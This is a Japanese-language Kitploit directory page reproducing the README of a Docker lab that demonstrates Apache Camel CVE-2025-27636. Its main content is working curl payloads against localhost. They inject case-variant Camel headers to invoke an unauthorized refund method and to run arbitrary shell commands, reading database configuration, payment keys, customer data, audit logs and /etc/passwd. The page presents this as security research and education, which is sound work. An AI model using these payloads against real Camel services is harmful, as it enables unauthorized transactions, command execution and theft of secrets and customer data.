Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-27636-demo — Apache Camel CVE-2025-27636を、Dockerベースのヘッダーインジェクション攻撃の再現とともに実演します。Beanメソッドインジェクションやコマンド実行を含み、セキュリティ研究および教育を目的としています。 | Kitploit
ツール/GitHubGitHub/crystallen1/cve-2025-27636-demo
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubcrystallen1/cve-2025-27636-demo

CVE-2025-27636-demo

Apache Camel CVE-2025-27636を、Dockerベースのヘッダーインジェクション攻撃の再現とともに実演します。Beanメソッドインジェクションやコマンド実行を含み、セキュリティ研究および教育を目的としています。

リポジトリを見る
10ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Apache Camel CVE デモンストレーション

このプロジェクトは、Apache Camel におけるヘッダーインジェクション攻撃に関連するセキュリティ脆弱性を実証するものです。

Docker ビルド

Docker イメージをビルドします:

root@kitploit:~
docker build -t camel-cve-demo .

Docker 実行

必要なすべてのポートを使用してコンテナを実行します:

root@kitploit:~
docker run -d `
  --name camel-cve-demo `
  -p 8080:8080 `
  -p 8081:8081 `
  -p 8484:8484 `
  -v ${PWD}/logs:/app/logs `
  -e JAVA_OPTS="-Xmx512m -Xms256m" `
  camel-cve-demo

攻撃の再現

1. Bean メソッドインジェクション攻撃

メソッド名を注入して脆弱なエンドポイントを悪用します:

root@kitploit:~
# 成功する攻撃 - 大文字小文字を区別するヘッダー
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

# 代替手段 - クエリパラメータインジェクション
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"

比較(これらは失敗するはずです):

root@kitploit:~
# 大文字小文字が間違っている場合 - 動作しないはず
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"

curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

2. コマンド実行攻撃

exec コンポーネントを悪用して任意のコマンドを実行します:

偵察:

root@kitploit:~
# 現在のディレクトリを確認
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"

# 設定ディレクトリを一覧表示
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"

# 設定ファイルを検索
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"

データの外部送信:

root@kitploit:~
# データベース設定を読み取る
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"

# 支払いシークレットを読み取る
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"

# 顧客データを読み取る
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/data/customers/customers.csv"

# 監査ログを読み取る
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/log/audit/audit.log"

# システムユーザーを読み取る
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/etc/passwd"

# プロセスを一覧表示
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs:aux"

攻撃結果の確認

コンテナ内の攻撃ログを確認します:

root@kitploit:~

# 不正な返金試行を表示
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt

ポート

  • 8080: メインアプリケーション(フロントエンド)
  • 8081: Bean インジェクションの脆弱なエンドポイント
  • 8484: Exec インジェクションの脆弱なエンドポイント
ツールをダウンロード